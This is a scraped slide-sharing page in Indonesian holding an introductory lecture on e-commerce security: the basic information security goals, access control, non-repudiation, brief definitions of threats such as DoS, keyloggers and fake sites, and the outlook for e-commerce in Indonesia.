Pertemuan 6
Pertemuan 6Pertemuan 6
Pertemuan 6
 
Computer ethics
Computer ethicsComputer ethics
Computer ethics
 
Etika dan keamanan dalam teknologi informasi
Etika dan keamanan dalam teknologi informasiEtika dan keamanan dalam teknologi informasi
Etika dan keamanan dalam teknologi informasi
 
Tugas kkm
Tugas kkmTugas kkm
Tugas kkm
 
Cybercrime
CybercrimeCybercrime
Cybercrime
 
Digital Forensic
Digital ForensicDigital Forensic
Digital Forensic
 
Cyber crime fahrunnisa ade
Cyber crime fahrunnisa adeCyber crime fahrunnisa ade
Cyber crime fahrunnisa ade
 
Pembobolan Bank Dengan IT
Pembobolan Bank Dengan ITPembobolan Bank Dengan IT
Pembobolan Bank Dengan IT
 
Tugas EPTIK
Tugas EPTIKTugas EPTIK
Tugas EPTIK
 

Similar to Azzahra e commerce 4

SIM 10, Afifah Luthfiah, Hapzi Ali, Keamanan Sistem Informasi, Univ. Mercu Bu...
SIM 10, Afifah Luthfiah, Hapzi Ali, Keamanan Sistem Informasi, Univ. Mercu Bu...SIM 10, Afifah Luthfiah, Hapzi Ali, Keamanan Sistem Informasi, Univ. Mercu Bu...
SIM 10, Afifah Luthfiah, Hapzi Ali, Keamanan Sistem Informasi, Univ. Mercu Bu...Afifah Luthfiah
 
UTS Keamanan Komputer.pptx
UTS Keamanan Komputer.pptxUTS Keamanan Komputer.pptx
UTS Keamanan Komputer.pptxFIKUNIVAL
 
Sim, feby ratna sari, hapzi ali, keamanan sistem informasi , universitas merc...
Sim, feby ratna sari, hapzi ali, keamanan sistem informasi , universitas merc...Sim, feby ratna sari, hapzi ali, keamanan sistem informasi , universitas merc...
Sim, feby ratna sari, hapzi ali, keamanan sistem informasi , universitas merc...febyratnasari
 
Tugas besar 1 kelompok 9 (sistem informasi manajemen) (4)
Tugas besar 1 kelompok 9 (sistem informasi manajemen) (4)Tugas besar 1 kelompok 9 (sistem informasi manajemen) (4)
Tugas besar 1 kelompok 9 (sistem informasi manajemen) (4)Rio Gunawan
 
Menjelaskan tentang sistem perlindungan sistem informasi.
Menjelaskan tentang sistem perlindungan sistem informasi.Menjelaskan tentang sistem perlindungan sistem informasi.
Menjelaskan tentang sistem perlindungan sistem informasi.ApriliaNingrum2
 
Tugas besar 1 kelompok 9 SIM (sistem informasi manajemen)
Tugas besar 1 kelompok 9 SIM (sistem informasi manajemen)Tugas besar 1 kelompok 9 SIM (sistem informasi manajemen)
Tugas besar 1 kelompok 9 SIM (sistem informasi manajemen)RifaldySaputra1
 
SI&PI, RYAN JULIAN, HAPZI ALI, DEFINISI DAN JENIS PENYERANGAN DAN PENYALAHGUN...
SI&PI, RYAN JULIAN, HAPZI ALI, DEFINISI DAN JENIS PENYERANGAN DAN PENYALAHGUN...SI&PI, RYAN JULIAN, HAPZI ALI, DEFINISI DAN JENIS PENYERANGAN DAN PENYALAHGUN...
SI&PI, RYAN JULIAN, HAPZI ALI, DEFINISI DAN JENIS PENYERANGAN DAN PENYALAHGUN...Ryan Julian
 
Keamanan dan Privasi Data Pengguna di Bidang Fintech - Polines - Oktober 2020...
Keamanan dan Privasi Data Pengguna di Bidang Fintech - Polines - Oktober 2020...Keamanan dan Privasi Data Pengguna di Bidang Fintech - Polines - Oktober 2020...
Keamanan dan Privasi Data Pengguna di Bidang Fintech - Polines - Oktober 2020...Ensign Handoko
 
2. SI&PI, Shalsabilla Desi, Hapzi Ali, Definisi dan Jenis Penyerangan dan Pen...
2. SI&PI, Shalsabilla Desi, Hapzi Ali, Definisi dan Jenis Penyerangan dan Pen...2. SI&PI, Shalsabilla Desi, Hapzi Ali, Definisi dan Jenis Penyerangan dan Pen...
2. SI&PI, Shalsabilla Desi, Hapzi Ali, Definisi dan Jenis Penyerangan dan Pen...ShalsabillaDMutiara
 
Sim, risky yoni septiana, prof. dr. ir. hapzi ali, m.m, cma, keamanan sistem ...
Sim, risky yoni septiana, prof. dr. ir. hapzi ali, m.m, cma, keamanan sistem ...Sim, risky yoni septiana, prof. dr. ir. hapzi ali, m.m, cma, keamanan sistem ...
Sim, risky yoni septiana, prof. dr. ir. hapzi ali, m.m, cma, keamanan sistem ...Riskyyoni
 
Keamanan sistem informasi
Keamanan sistem informasiKeamanan sistem informasi
Keamanan sistem informasidzulfadlie
 
memahami dan menganalisa Keamanan jaringan Komputer
memahami dan menganalisa Keamanan jaringan Komputermemahami dan menganalisa Keamanan jaringan Komputer
memahami dan menganalisa Keamanan jaringan Komputersmk methodist-8
 
1, si & pi, Ridho f widiatmoko (55518110002), Hapzi ali, ancaman terhadap sis...
1, si & pi, Ridho f widiatmoko (55518110002), Hapzi ali, ancaman terhadap sis...1, si & pi, Ridho f widiatmoko (55518110002), Hapzi ali, ancaman terhadap sis...
1, si & pi, Ridho f widiatmoko (55518110002), Hapzi ali, ancaman terhadap sis...Ridho F. Widiatmoko
 
Ar vol 3_no1_08_list4
Ar vol 3_no1_08_list4Ar vol 3_no1_08_list4
Ar vol 3_no1_08_list4rian75
 
Keamanan dan Privasi Data Pengguna di Bidang IoT - BK - Januari 2022.pptx
Keamanan dan Privasi Data Pengguna di Bidang IoT - BK - Januari 2022.pptxKeamanan dan Privasi Data Pengguna di Bidang IoT - BK - Januari 2022.pptx
Keamanan dan Privasi Data Pengguna di Bidang IoT - BK - Januari 2022.pptxEnsign Handoko
 
Sim, fina melinda jm, hapzi ali, keamanan sistem informasi, s1 akuntansi, uni...
Sim, fina melinda jm, hapzi ali, keamanan sistem informasi, s1 akuntansi, uni...Sim, fina melinda jm, hapzi ali, keamanan sistem informasi, s1 akuntansi, uni...
Sim, fina melinda jm, hapzi ali, keamanan sistem informasi, s1 akuntansi, uni...Fina Melinda Jumrotul Mu'minin
 
Sim 10, miftahul hidayah, hapzi ali, akuntansi s1, universitas mercu buana, 2018
Sim 10, miftahul hidayah, hapzi ali, akuntansi s1, universitas mercu buana, 2018Sim 10, miftahul hidayah, hapzi ali, akuntansi s1, universitas mercu buana, 2018
Sim 10, miftahul hidayah, hapzi ali, akuntansi s1, universitas mercu buana, 2018MiftahulHidayah4
 
E Business - Chp 10.pptx
E Business - Chp 10.pptxE Business - Chp 10.pptx
E Business - Chp 10.pptxKelvinSaputra12
 

Similar to Azzahra e commerce 4 (20)

SIM 10, Afifah Luthfiah, Hapzi Ali, Keamanan Sistem Informasi, Univ. Mercu Bu...
SIM 10, Afifah Luthfiah, Hapzi Ali, Keamanan Sistem Informasi, Univ. Mercu Bu...SIM 10, Afifah Luthfiah, Hapzi Ali, Keamanan Sistem Informasi, Univ. Mercu Bu...
SIM 10, Afifah Luthfiah, Hapzi Ali, Keamanan Sistem Informasi, Univ. Mercu Bu...
 
UTS Keamanan Komputer.pptx
UTS Keamanan Komputer.pptxUTS Keamanan Komputer.pptx
UTS Keamanan Komputer.pptx
 
Sim, feby ratna sari, hapzi ali, keamanan sistem informasi , universitas merc...
Sim, feby ratna sari, hapzi ali, keamanan sistem informasi , universitas merc...Sim, feby ratna sari, hapzi ali, keamanan sistem informasi , universitas merc...
Sim, feby ratna sari, hapzi ali, keamanan sistem informasi , universitas merc...
 
Pertemuan 1.pptx
Pertemuan 1.pptxPertemuan 1.pptx
Pertemuan 1.pptx
 
Tugas besar 1 kelompok 9 (sistem informasi manajemen) (4)
Tugas besar 1 kelompok 9 (sistem informasi manajemen) (4)Tugas besar 1 kelompok 9 (sistem informasi manajemen) (4)
Tugas besar 1 kelompok 9 (sistem informasi manajemen) (4)
 
Menjelaskan tentang sistem perlindungan sistem informasi.
Menjelaskan tentang sistem perlindungan sistem informasi.Menjelaskan tentang sistem perlindungan sistem informasi.
Menjelaskan tentang sistem perlindungan sistem informasi.
 
Tugas besar 1 kelompok 9 SIM (sistem informasi manajemen)
Tugas besar 1 kelompok 9 SIM (sistem informasi manajemen)Tugas besar 1 kelompok 9 SIM (sistem informasi manajemen)
Tugas besar 1 kelompok 9 SIM (sistem informasi manajemen)
 
SI&PI, RYAN JULIAN, HAPZI ALI, DEFINISI DAN JENIS PENYERANGAN DAN PENYALAHGUN...
SI&PI, RYAN JULIAN, HAPZI ALI, DEFINISI DAN JENIS PENYERANGAN DAN PENYALAHGUN...SI&PI, RYAN JULIAN, HAPZI ALI, DEFINISI DAN JENIS PENYERANGAN DAN PENYALAHGUN...
SI&PI, RYAN JULIAN, HAPZI ALI, DEFINISI DAN JENIS PENYERANGAN DAN PENYALAHGUN...
 
Modul 14 terry
Modul 14 terryModul 14 terry
Modul 14 terry
 
Keamanan dan Privasi Data Pengguna di Bidang Fintech - Polines - Oktober 2020...
Keamanan dan Privasi Data Pengguna di Bidang Fintech - Polines - Oktober 2020...Keamanan dan Privasi Data Pengguna di Bidang Fintech - Polines - Oktober 2020...
Keamanan dan Privasi Data Pengguna di Bidang Fintech - Polines - Oktober 2020...
 
2. SI&PI, Shalsabilla Desi, Hapzi Ali, Definisi dan Jenis Penyerangan dan Pen...
2. SI&PI, Shalsabilla Desi, Hapzi Ali, Definisi dan Jenis Penyerangan dan Pen...2. SI&PI, Shalsabilla Desi, Hapzi Ali, Definisi dan Jenis Penyerangan dan Pen...
2. SI&PI, Shalsabilla Desi, Hapzi Ali, Definisi dan Jenis Penyerangan dan Pen...
 
Sim, risky yoni septiana, prof. dr. ir. hapzi ali, m.m, cma, keamanan sistem ...
Sim, risky yoni septiana, prof. dr. ir. hapzi ali, m.m, cma, keamanan sistem ...Sim, risky yoni septiana, prof. dr. ir. hapzi ali, m.m, cma, keamanan sistem ...
Sim, risky yoni septiana, prof. dr. ir. hapzi ali, m.m, cma, keamanan sistem ...
 
Keamanan sistem informasi
Keamanan sistem informasiKeamanan sistem informasi
Keamanan sistem informasi
 
memahami dan menganalisa Keamanan jaringan Komputer
memahami dan menganalisa Keamanan jaringan Komputermemahami dan menganalisa Keamanan jaringan Komputer
memahami dan menganalisa Keamanan jaringan Komputer
 
1, si & pi, Ridho f widiatmoko (55518110002), Hapzi ali, ancaman terhadap sis...
1, si & pi, Ridho f widiatmoko (55518110002), Hapzi ali, ancaman terhadap sis...1, si & pi, Ridho f widiatmoko (55518110002), Hapzi ali, ancaman terhadap sis...
1, si & pi, Ridho f widiatmoko (55518110002), Hapzi ali, ancaman terhadap sis...
 
Ar vol 3_no1_08_list4
Ar vol 3_no1_08_list4Ar vol 3_no1_08_list4
Ar vol 3_no1_08_list4
 
Keamanan dan Privasi Data Pengguna di Bidang IoT - BK - Januari 2022.pptx
Keamanan dan Privasi Data Pengguna di Bidang IoT - BK - Januari 2022.pptxKeamanan dan Privasi Data Pengguna di Bidang IoT - BK - Januari 2022.pptx
Keamanan dan Privasi Data Pengguna di Bidang IoT - BK - Januari 2022.pptx
 
Sim, fina melinda jm, hapzi ali, keamanan sistem informasi, s1 akuntansi, uni...
Sim, fina melinda jm, hapzi ali, keamanan sistem informasi, s1 akuntansi, uni...Sim, fina melinda jm, hapzi ali, keamanan sistem informasi, s1 akuntansi, uni...
Sim, fina melinda jm, hapzi ali, keamanan sistem informasi, s1 akuntansi, uni...
 
Sim 10, miftahul hidayah, hapzi ali, akuntansi s1, universitas mercu buana, 2018
Sim 10, miftahul hidayah, hapzi ali, akuntansi s1, universitas mercu buana, 2018Sim 10, miftahul hidayah, hapzi ali, akuntansi s1, universitas mercu buana, 2018
Sim 10, miftahul hidayah, hapzi ali, akuntansi s1, universitas mercu buana, 2018
 
E Business - Chp 10.pptx
E Business - Chp 10.pptxE Business - Chp 10.pptx
E Business - Chp 10.pptx
 

Recently uploaded

Modul Ajar Bahasa Indonesia Kelas 4 Fase B
Modul Ajar Bahasa Indonesia Kelas 4 Fase BModul Ajar Bahasa Indonesia Kelas 4 Fase B
Modul Ajar Bahasa Indonesia Kelas 4 Fase BAbdiera
 
tugas 1 anak berkebutihan khusus pelajaran semester 6 jawaban tuton 1.docx
tugas 1 anak berkebutihan khusus pelajaran semester 6 jawaban tuton 1.docxtugas 1 anak berkebutihan khusus pelajaran semester 6 jawaban tuton 1.docx
tugas 1 anak berkebutihan khusus pelajaran semester 6 jawaban tuton 1.docxmawan5982
 
ppt-modul-6-pend-seni-di sd kelompok 2 ppt
ppt-modul-6-pend-seni-di sd kelompok 2 pptppt-modul-6-pend-seni-di sd kelompok 2 ppt
ppt-modul-6-pend-seni-di sd kelompok 2 pptArkhaRega1
 
Dampak Pendudukan Jepang.pptx indonesia1
Dampak Pendudukan Jepang.pptx indonesia1Dampak Pendudukan Jepang.pptx indonesia1
Dampak Pendudukan Jepang.pptx indonesia1udin100
 
KONSEP KEBUTUHAN AKTIVITAS DAN LATIHAN.pptx
KONSEP KEBUTUHAN AKTIVITAS DAN LATIHAN.pptxKONSEP KEBUTUHAN AKTIVITAS DAN LATIHAN.pptx
KONSEP KEBUTUHAN AKTIVITAS DAN LATIHAN.pptxawaldarmawan3
 
tugas 1 tutorial online anak berkebutuhan khusus di SD
tugas 1 tutorial online anak berkebutuhan khusus di SDtugas 1 tutorial online anak berkebutuhan khusus di SD
tugas 1 tutorial online anak berkebutuhan khusus di SDmawan5982
 
Kesebangunan Segitiga matematika kelas 7 kurikulum merdeka.pptx
Kesebangunan Segitiga matematika kelas 7 kurikulum merdeka.pptxKesebangunan Segitiga matematika kelas 7 kurikulum merdeka.pptx
Kesebangunan Segitiga matematika kelas 7 kurikulum merdeka.pptxDwiYuniarti14
 
Bab 6 Kreatif Mengungap Rasa dan Realitas.pdf
Bab 6 Kreatif Mengungap Rasa dan Realitas.pdfBab 6 Kreatif Mengungap Rasa dan Realitas.pdf
Bab 6 Kreatif Mengungap Rasa dan Realitas.pdfbibizaenab
 
Karakteristik Negara Mesir (Geografi Regional Dunia)
Karakteristik Negara Mesir (Geografi Regional Dunia)Karakteristik Negara Mesir (Geografi Regional Dunia)
Karakteristik Negara Mesir (Geografi Regional Dunia)3HerisaSintia
 
Modul Ajar Pendidikan Pancasila Kelas 5 Fase C
Modul Ajar Pendidikan Pancasila Kelas 5 Fase CModul Ajar Pendidikan Pancasila Kelas 5 Fase C
Modul Ajar Pendidikan Pancasila Kelas 5 Fase CAbdiera
 
PPT Integrasi Islam & Ilmu Pengetahuan.pptx
PPT Integrasi Islam & Ilmu Pengetahuan.pptxPPT Integrasi Islam & Ilmu Pengetahuan.pptx
PPT Integrasi Islam & Ilmu Pengetahuan.pptxnerow98
 
DEMONSTRASI KONTEKSTUAL MODUL 1.3 PENDIDIKAN GURU PENGGERAK
DEMONSTRASI KONTEKSTUAL MODUL 1.3 PENDIDIKAN GURU PENGGERAKDEMONSTRASI KONTEKSTUAL MODUL 1.3 PENDIDIKAN GURU PENGGERAK
DEMONSTRASI KONTEKSTUAL MODUL 1.3 PENDIDIKAN GURU PENGGERAKirwan461475
 
Dinamika Hidrosfer geografi kelas X genap
Dinamika Hidrosfer geografi kelas X genapDinamika Hidrosfer geografi kelas X genap
Dinamika Hidrosfer geografi kelas X genapsefrida3
 
Lembar Observasi Pembelajaran di Kelas.docx
Lembar Observasi Pembelajaran di  Kelas.docxLembar Observasi Pembelajaran di  Kelas.docx
Lembar Observasi Pembelajaran di Kelas.docxbkandrisaputra
 
421783639-ppt-overdosis-dan-keracunan-pptx.pptx
421783639-ppt-overdosis-dan-keracunan-pptx.pptx421783639-ppt-overdosis-dan-keracunan-pptx.pptx
421783639-ppt-overdosis-dan-keracunan-pptx.pptxGiftaJewela
 
Lembar Catatan Percakapan Pasca observasidocx
Lembar Catatan Percakapan Pasca observasidocxLembar Catatan Percakapan Pasca observasidocx
Lembar Catatan Percakapan Pasca observasidocxbkandrisaputra
 
HARMONI DALAM EKOSISTEM KELAS V SEKOLAH DASAR.pdf
HARMONI DALAM EKOSISTEM KELAS V SEKOLAH DASAR.pdfHARMONI DALAM EKOSISTEM KELAS V SEKOLAH DASAR.pdf
HARMONI DALAM EKOSISTEM KELAS V SEKOLAH DASAR.pdfkustiyantidew94
 
MODUL AJAR MATEMATIKA KELAS 6 KURIKULUM MERDEKA
MODUL AJAR MATEMATIKA KELAS 6 KURIKULUM MERDEKAMODUL AJAR MATEMATIKA KELAS 6 KURIKULUM MERDEKA
MODUL AJAR MATEMATIKA KELAS 6 KURIKULUM MERDEKAAndiCoc
 
soal AKM Mata Pelajaran PPKN kelas .pptx
soal AKM Mata Pelajaran PPKN kelas .pptxsoal AKM Mata Pelajaran PPKN kelas .pptx
soal AKM Mata Pelajaran PPKN kelas .pptxazhari524
 
REFLEKSI MANDIRI_Prakarsa Perubahan BAGJA Modul 1.3.pdf
REFLEKSI MANDIRI_Prakarsa Perubahan BAGJA Modul 1.3.pdfREFLEKSI MANDIRI_Prakarsa Perubahan BAGJA Modul 1.3.pdf
REFLEKSI MANDIRI_Prakarsa Perubahan BAGJA Modul 1.3.pdfirwanabidin08
 

Recently uploaded (20)

Modul Ajar Bahasa Indonesia Kelas 4 Fase B
Modul Ajar Bahasa Indonesia Kelas 4 Fase BModul Ajar Bahasa Indonesia Kelas 4 Fase B
Modul Ajar Bahasa Indonesia Kelas 4 Fase B
 
tugas 1 anak berkebutihan khusus pelajaran semester 6 jawaban tuton 1.docx
tugas 1 anak berkebutihan khusus pelajaran semester 6 jawaban tuton 1.docxtugas 1 anak berkebutihan khusus pelajaran semester 6 jawaban tuton 1.docx
tugas 1 anak berkebutihan khusus pelajaran semester 6 jawaban tuton 1.docx
 
ppt-modul-6-pend-seni-di sd kelompok 2 ppt
ppt-modul-6-pend-seni-di sd kelompok 2 pptppt-modul-6-pend-seni-di sd kelompok 2 ppt
ppt-modul-6-pend-seni-di sd kelompok 2 ppt
 
Dampak Pendudukan Jepang.pptx indonesia1
Dampak Pendudukan Jepang.pptx indonesia1Dampak Pendudukan Jepang.pptx indonesia1
Dampak Pendudukan Jepang.pptx indonesia1
 
KONSEP KEBUTUHAN AKTIVITAS DAN LATIHAN.pptx
KONSEP KEBUTUHAN AKTIVITAS DAN LATIHAN.pptxKONSEP KEBUTUHAN AKTIVITAS DAN LATIHAN.pptx
KONSEP KEBUTUHAN AKTIVITAS DAN LATIHAN.pptx
 
tugas 1 tutorial online anak berkebutuhan khusus di SD
tugas 1 tutorial online anak berkebutuhan khusus di SDtugas 1 tutorial online anak berkebutuhan khusus di SD
tugas 1 tutorial online anak berkebutuhan khusus di SD
 
Kesebangunan Segitiga matematika kelas 7 kurikulum merdeka.pptx
Kesebangunan Segitiga matematika kelas 7 kurikulum merdeka.pptxKesebangunan Segitiga matematika kelas 7 kurikulum merdeka.pptx
Kesebangunan Segitiga matematika kelas 7 kurikulum merdeka.pptx
 
Bab 6 Kreatif Mengungap Rasa dan Realitas.pdf
Bab 6 Kreatif Mengungap Rasa dan Realitas.pdfBab 6 Kreatif Mengungap Rasa dan Realitas.pdf
Bab 6 Kreatif Mengungap Rasa dan Realitas.pdf
 
Karakteristik Negara Mesir (Geografi Regional Dunia)
Karakteristik Negara Mesir (Geografi Regional Dunia)Karakteristik Negara Mesir (Geografi Regional Dunia)
Karakteristik Negara Mesir (Geografi Regional Dunia)
 
Modul Ajar Pendidikan Pancasila Kelas 5 Fase C
Modul Ajar Pendidikan Pancasila Kelas 5 Fase CModul Ajar Pendidikan Pancasila Kelas 5 Fase C
Modul Ajar Pendidikan Pancasila Kelas 5 Fase C
 
PPT Integrasi Islam & Ilmu Pengetahuan.pptx
PPT Integrasi Islam & Ilmu Pengetahuan.pptxPPT Integrasi Islam & Ilmu Pengetahuan.pptx
PPT Integrasi Islam & Ilmu Pengetahuan.pptx
 
DEMONSTRASI KONTEKSTUAL MODUL 1.3 PENDIDIKAN GURU PENGGERAK
DEMONSTRASI KONTEKSTUAL MODUL 1.3 PENDIDIKAN GURU PENGGERAKDEMONSTRASI KONTEKSTUAL MODUL 1.3 PENDIDIKAN GURU PENGGERAK
DEMONSTRASI KONTEKSTUAL MODUL 1.3 PENDIDIKAN GURU PENGGERAK
 
Dinamika Hidrosfer geografi kelas X genap
Dinamika Hidrosfer geografi kelas X genapDinamika Hidrosfer geografi kelas X genap
Dinamika Hidrosfer geografi kelas X genap
 
Lembar Observasi Pembelajaran di Kelas.docx
Lembar Observasi Pembelajaran di  Kelas.docxLembar Observasi Pembelajaran di  Kelas.docx
Lembar Observasi Pembelajaran di Kelas.docx
 
421783639-ppt-overdosis-dan-keracunan-pptx.pptx
421783639-ppt-overdosis-dan-keracunan-pptx.pptx421783639-ppt-overdosis-dan-keracunan-pptx.pptx
421783639-ppt-overdosis-dan-keracunan-pptx.pptx
 
Lembar Catatan Percakapan Pasca observasidocx
Lembar Catatan Percakapan Pasca observasidocxLembar Catatan Percakapan Pasca observasidocx
Lembar Catatan Percakapan Pasca observasidocx
 
HARMONI DALAM EKOSISTEM KELAS V SEKOLAH DASAR.pdf
HARMONI DALAM EKOSISTEM KELAS V SEKOLAH DASAR.pdfHARMONI DALAM EKOSISTEM KELAS V SEKOLAH DASAR.pdf
HARMONI DALAM EKOSISTEM KELAS V SEKOLAH DASAR.pdf
 
MODUL AJAR MATEMATIKA KELAS 6 KURIKULUM MERDEKA
MODUL AJAR MATEMATIKA KELAS 6 KURIKULUM MERDEKAMODUL AJAR MATEMATIKA KELAS 6 KURIKULUM MERDEKA
MODUL AJAR MATEMATIKA KELAS 6 KURIKULUM MERDEKA
 
soal AKM Mata Pelajaran PPKN kelas .pptx
soal AKM Mata Pelajaran PPKN kelas .pptxsoal AKM Mata Pelajaran PPKN kelas .pptx
soal AKM Mata Pelajaran PPKN kelas .pptx
 
REFLEKSI MANDIRI_Prakarsa Perubahan BAGJA Modul 1.3.pdf
REFLEKSI MANDIRI_Prakarsa Perubahan BAGJA Modul 1.3.pdfREFLEKSI MANDIRI_Prakarsa Perubahan BAGJA Modul 1.3.pdf
REFLEKSI MANDIRI_Prakarsa Perubahan BAGJA Modul 1.3.pdf
 

Azzahra e commerce 4

  • 2. Aspek Keamanan E – Commerce KONSEP DASAR KEAMANAN E-COMMERCE COMPUTER CRIME adalah istilah yang mengacu kepada aktivitas kejahatan dengan komputer atau jaringan komputer menjadi alat, sasaran atau tempat terjadinya kejahatan. Termasuk ke dalam kejahatan dunia maya antara lain adalah Penipuan dan pemalsuan (kartu Kredit,lelang,identitas, dll) Pencurian data Pengiriman virus Pornografi,  dll
  • 3. Hal – Hal yang menyebabkan Bekembangnya KEJAHATAN ON LINE 1. Aplikasi bisnis berbasis teknologi informasi & jaringan semakin meningkat 2. Desentralisasi server 3. Transisi dari single vendor ke Multi vendor 4. Meningkatnya kemampuan pemakai di bidang komputer 5. Mudahnya memperoleh sofware untuk menyerang komputer dan jaringan 6. Kesulitan dari penegak hukum untuk mengejar pelaku di dunia komputer & telekomunikasi
  • 4. INFORMATION SECURITY – Keamanan Informasi merupakan bagian terpenting dari E-Commerce – Sistem Keamanan informasi memiliki empat macam tujuan yang sangat mendasar : 1. Confidentiality 2. Intergrity 3. Availability 4. Authentication
  • 5. Confidentiality • Kerahasiaan, usaha menjaga informasi dari orang yang tidak berhak • Menjamin apakah informasi yang dikirim tersebut tidak dapat dibuka atau diketahui oleh orang yang tidak berhak Integrity • Menjamin pengguna yang sah bisa mengakses informasi sumber miliknya sendiri • Orang yang tidak berhak ditolak untuk mengakses informasi • Enkripsi dan Digital Signature
  • 6. Integrity menjamin konsistensi data, informasi tidak boleh diubah seijin pemilik informasi 1. Keaslian Data 2. Keutuhan Data 3. Penduplikatan data
  • 7. Availability • Ketersediaan Informasi ketika dibutuhkan • Sistem Infomasi yang diserang atau dijebol dapat menghambat informasi ketika dibutuhkan • DoS (Denial of service attack), • Pembanjiran permintaan pada server • Mailbomb
  • 8. Authentication/Legitimate Use • Metode yang menyatakan bahwa informasi betul-betul asli • Orang yang mengakses atau memberikan informasi betul spt yang dimaksud • Keaslian Dokumen : Watermaking, digital signature
  • 9. Aspek Keamanan E-Commerce Dua aspek berkaitan dengan keamanan E-commerce : 1. Acces Control 2. Non-repudiation
  • 10. Access Control • Pengaturan akses kepada informasi • Mekanisme Klasifikasi Pengguna ( Public,Privat,Confidental, top secret User (guest atau admin)) Ada 3 hal access kontrol : 1. What You Have (Kartu Id, ATM) 2. What You Know (Pasword,PIN) 3. What You Are (Sidik Jari, biometric)
  • 11. Non Repudiation  Seseorang tidak menyangkal telah melakukan transaksi  Digital Signature Certifiates (tanda tangan digital), Tekonologi Kriptografi (merubah huruf menjadi simbol tertentu) (SSL Server (Enkripsi Secure Socket Layer) melindungi komunikasi transaksi kartu kredit
  • 12. 2 BIDANG UNTUK PENERAPAN DAN MENCAPAI TEKNOLOGI KEAMANAN INFORMASI 1. Sistem Keamanan Komunikasi Merupakan perlindungan terhadap informasi ketika dikirim dari sebuah sistem ke sistem lainnya 2. Sistem Keamanan Komputer Perlindungan terhadap sistem informasi komputer itu sendiri meliputi keamanan perangkat lunak sistem operasi, keamanan terhadap perangkat lunak manajemen database komputer
  • 13. CONTOH SERVICE KEAMANAN MEKANISME NON ELEKTONIK • Authentication > Indentitas diri,foto • Access Control >Checkpoint guard • Confidentiality > Surat tersegel, Tinta yang tidak terlihat • Intergrity > Data Tidak dpt dihapus,Hologram • Non-Repudiation > Tanda tangan Notaris, Surat teregistrasi
  • 14. FAKTOR KEAMANAN LAINNYA Keamanan secara fisik • Penjaga keamanan, pintu terkunci, sistem kontrol dll • Keamanan personal • Kepribadian & tanggung jawab personal • Keamanan administratif • Kontrol terhadap perangkat lunak yang digunakan • Keamanan media yang digunakan • Media security terhadap media penyimpanan
  • 15. > Security Policy • Faktor yang mendasar untuk keamanan komunikasi E-commerce > Authorization • Kebijakan keamanan yang digunakan, merupakan set aturan dalam security domain
  • 16. OTORISASI BAGIAN DARI SECURITY POLICY BERUPA PEMBERIAN KEGIATAN SECARA HUKUM UNTUK MELAKUKAN SEGALA AKTIVITAS • Accountability (Akses personal security) • A Threat (Ancaman yang tidak diinginkan) • An Attack (Serangan dari ancaman (pasive attack, active attack) • Safeguards Pengamanan kontrol fisik, mekanisme,kebijakan & prosedur melindungi informasi • Vulnerabilities Lubang celah kemanan yang mudah ditembus • Risk Analysis (Resiko Kerugian)
  • 17. THREATS (ANCAMAN) • System Penetration Orang yang tidak berhak mendapat akses ke sistem • Authorization Violation Pelanggaran penyalahgunaan wewenang legal • Planting Future attack, serangan kesistem yang tidak dilakukan secara langsung • Communications Monitoring • Denial of service Akses service user dihalangi • Reduption Penolakan terhadap sebuah aktifitas transaksi
  • 18. Cyber Crime 1. Typosite, membuat situs palsu yang penampilannya sama dengan situs aslinya,dengan harapan korban salah mengetik alamat bank resmi sehingga melakukan transaksi online banking di situs miliknya. 2. Key Logger, sebuah cara mengunci tombol keyboard dengan menggunakan program logger tertentu sehingga jejak pengguna setiap kali memencet tombol dapat terekam di komputer. 3. Cookies/Pathfinder, sebuah program yang bisa menampilkan kembali apa saja yang telah diketik seseorang (mirip dengan key logger). 4. Magnetic Card Reader, suatu alat yang bisa digunakan untuk membaca informasi apa saja pada sebuah kartu, baik kartu kredit, debet, maupun cash. Biasanya terjadi pada orang yang kehilangan kartunya.
  • 24. MASA DEPAN E – COMMERCE Perkembangan E-Commerce di Indonesia Di dalam perkembangan E-Commerce di Indonesia, memiliki tantangan - tantangan, diantaranya yaitu : 1. Kultur • Masyarakat Indonesia, yang masih belum terbiasa dalam berbelanja dengan katalog. • Masih harus melihat secara fisik atau memegang barang yang akan dijual. • Masih senang menawar harga yang dijual. 2. Kepercayaan • Kepercayaan antara penjual dan pembeli masih tipis. • Kepercayaan kepada pembayaran elektronik masih kurang. • Penggunaan masih jarang.
  • 25. MASA DEPAN E-COMMERCE ? Tampaknya e-commerce mempunyai masa depan yang cerah. Jika berbagai detail dari perdagangan online ini dapat diselesaikan maka bukan mustahil e-commerce dan Internet akan mengubah struktur dunia usaha secara global. Dengan perkembangan masyarakat virtual yang demikian besar - banyak orang yang berpartisipasi dalam berbagai interest group online - memperlihatkan pergeseran paradigma dari kekuatan ekonomi yang bertumpu pada pembuat / manufacturer ke kekuatan pasar.
  • 26. Paling tidak demikian yang dilihat oleh John Hagel dan Arthur Armstrong, sepasang analis dari McKinsey http://www.mckinsey.com/ sebuah perusahaan konsultan manajemen internasional. ParentsPlace http://www.parentsplace.com/ merupakan tempat pertemuan para orang tua yang akhirnya memberikan kesempatan pada vendor-vendor kecil untuk mencapai pelanggan potensial mereka untuk produk yang sangat spesifik seperti makanan bayi dan shampo.
  • 27. BASIS IMPLEMENTASI E-COMMERCE BAGI WIRAUSAHAWAN • Mempunyai produk untuk dijual. • Mempunyai moralitas dan motivasi diri : jujur, positif, sabar, komprehensif, rasional, energik, visi dan misi. • Harus mempunyai infrastruktur internet, komputer dan website (gratis/berbayar). • Manajemen administrasi dan akutansi : punya metode pembayaran melalui bank, paypal, western union, dll, sistem purchase order, invoicing, receipt dan good accounting.
  • 28. • Mempunyai strategi Customer Support. Berguna untuk proses transaksi dan layanan after sales. • Manajemen Quality Control, Packing dan Ekpedisi. Untuk kontrol kualitas produk, pengemasan dan pengiriman kepada pembeli. • Mempunyai strategi Internet Marketing (IM). Berguna untuk marketing, public relation dan branding. • Mempunyai jiwa spiritual dan sosial.
  • 30. Akses • Fokus dari masalah akses adalah pada penyediaan akses untuk semua kalangan. • Teknologi informasi diharapkan tidak menjadi halangan dalam melakukan pengaksesan terhadap informasi bagi kelompok orang tertentu.
  • 31. Keamanan • Perlindungan terhadap informasi dan sistem informasi dari akses, penggunaan, pengungkapan, kerusakan, gangguan, atau modifikasi yang tidak sah. • Ancaman terhadap sistem informasi dibagi menjadi 2 yaitu : –Ancaman aktif –Ancaman pasif
  • 32. Keamanan • Ancaman aktif meliputi kecurangan, penipuan dan kejahatan terhadap komputer. • Ancaman pasif meliputi kegagalan sistem, kesalahan manusia, dan bencana alam.
